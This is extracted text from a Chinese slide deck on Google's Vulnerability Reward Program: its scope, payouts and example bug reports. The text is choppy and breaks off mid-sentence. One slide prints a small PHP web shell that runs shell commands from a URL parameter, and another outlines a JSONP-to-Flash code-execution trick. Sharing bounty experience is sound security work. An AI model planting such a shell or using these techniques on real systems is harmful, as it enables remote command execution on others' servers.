Google漏洞奖励计划经验分享.pdf

“关于Benjamins的所有内容 谷歌漏洞奖励计划 议程 •历史 •谷歌网页 •建议 •结论 议程 •历史 •谷歌网页 •建议 •结论 历史 议程 •历史 •谷歌网页 •建议 •结论 谷歌网页:: 准备 •反馈/支持： •安全小组 o法定的 o 预算 o所有工程师 •座谈形式 •工作室 谷歌网页::范围:: 应用程序 * * 谷歌网页::范围:: 应用程序 谷歌网页::范围:: 漏洞 Mixed Scripting XSRF 谷歌网页::范围:: 漏洞 XSS Auth Bypass 谷歌网页::范围:: 漏洞 SQLi 谷歌网页::范围:: 漏洞 RCE 谷歌网页::范围:: 漏洞 XSS 不包含以下攻击: •DoS •corp infrastructure •SEO blackhat •acquisitions (if 6 months) Mixed content auth SQLi bypass XSRF 谷歌网页:: PHPicture 谷歌网页:: PHPicture 谷歌网页:: PHPicture ?php header(Content-Type: text/plain); if(isset($_GET[cmd])) { $cmd = $_GET[cmd]; echo shell_exec($cmd); } ? 谷歌网页:: PHPicture •上传广告图片 •PHP服务器 •低性能扩展处理 $3,133.70 $5,000 - $20,000 谷歌网页:: 合格 •合理的通知 •私下的信息披露 •适当的测试 •第一个提出的最好的解决 谷歌网页:: 结果 •返回结果立即提高 •相当好的信噪比 •幅度增长 •智能的bugs •有趣的bugs 谷歌网页:: JSON... 如果是JSON文件? 谷歌网页:: JSON2Flash 谷歌网页:: JSON2Flash •允许用户使用自定义的回调方法 o标准 • Alex Dobkin 设置回调函数名称FWS0abcd oFlash文件“魔数” o非标准 谷歌网页:: JSON2Flash •它能够构建一个（几乎）纯字母的flash文件下载并展现 的源码 o需要NULL字节  幸好 (或是不幸)他们没有编码. •创建一个GOTO/jump 跳转到恶意代码JSONP. •作为ActionScript代码执行. 谷歌网页:: 结果 •修复? •从收到通知算起，总共花了8天 •在开始添加了评论! // API callback FWSabcdef({version:1.0 •因为这个bug比较聪明，虽然一个XSS 只值$500，我们仍花费 $1,337 o呵呵, 我们也雇佣了他. 谷歌网页:: 免费电影 你好, 我发现当游戏商店降价时，你可以观看一部电影. 用一张爆 卡你就可以免费观看一部电影或者电视. 我屡试不爽. 我不 确定这个报告是否可以得到报酬，但我确实希望如此，因 为这样可以